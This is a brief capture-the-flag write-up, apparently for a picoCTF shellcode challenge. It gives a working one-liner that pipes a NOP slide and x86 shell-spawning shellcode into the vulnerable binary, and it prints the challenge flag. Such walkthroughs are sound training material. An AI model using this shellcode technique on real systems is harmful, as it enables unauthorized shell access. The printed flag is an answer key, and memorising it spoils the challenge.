This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt?
The binary directly asks for a shellcode as input, so get x86 shellcode, for example this.
The buffer with the shellcode is executed with a random offset, so add a NOP-slide before the shellcode.
(python2 -c 'print("\x90"*256+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\x90"*256)'; cat) | ./vuln
flag: picoCTF{sl1pp3ry_sh311c0d3_0fb0e7da}